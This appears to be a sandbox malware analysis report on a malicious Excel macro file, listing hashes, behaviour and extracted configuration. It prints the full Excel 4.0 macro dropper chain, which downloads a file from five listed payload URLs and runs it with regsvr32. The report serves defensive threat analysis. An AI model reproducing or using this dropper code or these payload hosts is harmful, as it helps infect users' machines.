Overview

overview

10

Static

static

10

48315b0e07...9.xlsm

windows7-x64

10

48315b0e07...9.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    48315b0e07f3a7c0f1119c543b499f97d49ffaa838a3d3e32de8fc3a16852c49

  • Size

    95KB

  • Sample

    241120-zw7kcasgrc

  • MD5

    797d8843fb9328d3cab7ac0f2219d784

  • SHA1

    f6a41102de25523dcba0d5215040fbaa499ccc5c

  • SHA256

    48315b0e07f3a7c0f1119c543b499f97d49ffaa838a3d3e32de8fc3a16852c49

  • SHA512

    79d1516202e86794760902ea01ea9dc57209e1cb4a0b44ba8fccf781a63c2ff57f4a1a975013c6769d3daa8a03d01fa90358238660f0ce0ac2dc999793ceb424

  • SSDEEP

    1536:Z+nXm5MB5Dg8cVoioFh+fYFl69oXiZ5bcvJlqGiwIWx1BcVXzAyVZF:Z43DsVhonV69o2bchgGaWBcpASF

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://gavalisangh.astravit.com/umar-rack/fyMw4DZw1JAB/

http://spanish.swslawfirm.com/wp-admin/llSlMYOLL/

https://wowssipworld.com/wp-snapshots/7EzFXGUC3p0ffli/

https://lucacerullo.com/wp-admin/sZ7Sw/

http://198.50.143.158/cgi-bin/PsABe8gznY/
Attributes
  • formulas

    =FORMULA() =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gavalisangh.astravit.com/umar-rack/fyMw4DZw1JAB/","..\wo1.ocx",0,0) =IF('EFWFSFG'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://spanish.swslawfirm.com/wp-admin/llSlMYOLL/","..\wo1.ocx",0,0)) =IF('EFWFSFG'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://wowssipworld.com/wp-snapshots/7EzFXGUC3p0ffli/","..\wo1.ocx",0,0)) =IF('EFWFSFG'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://lucacerullo.com/wp-admin/sZ7Sw/","..\wo1.ocx",0,0)) =IF('EFWFSFG'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://198.50.143.158/cgi-bin/PsABe8gznY/","..\wo1.ocx",0,0)) =IF('EFWFSFG'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\wo1.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://gavalisangh.astravit.com/umar-rack/fyMw4DZw1JAB/
xlm40.dropper

http://spanish.swslawfirm.com/wp-admin/llSlMYOLL/
xlm40.dropper

https://wowssipworld.com/wp-snapshots/7EzFXGUC3p0ffli/
xlm40.dropper

https://lucacerullo.com/wp-admin/sZ7Sw/
xlm40.dropper

http://198.50.143.158/cgi-bin/PsABe8gznY/

Targets

    • Target

      48315b0e07f3a7c0f1119c543b499f97d49ffaa838a3d3e32de8fc3a16852c49

    • Size

      95KB

    • MD5

      797d8843fb9328d3cab7ac0f2219d784

    • SHA1

      f6a41102de25523dcba0d5215040fbaa499ccc5c

    • SHA256

      48315b0e07f3a7c0f1119c543b499f97d49ffaa838a3d3e32de8fc3a16852c49

    • SHA512

      79d1516202e86794760902ea01ea9dc57209e1cb4a0b44ba8fccf781a63c2ff57f4a1a975013c6769d3daa8a03d01fa90358238660f0ce0ac2dc999793ceb424

    • SSDEEP

      1536:Z+nXm5MB5Dg8cVoioFh+fYFl69oXiZ5bcvJlqGiwIWx1BcVXzAyVZF:Z43DsVhonV69o2bchgGaWBcpASF

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks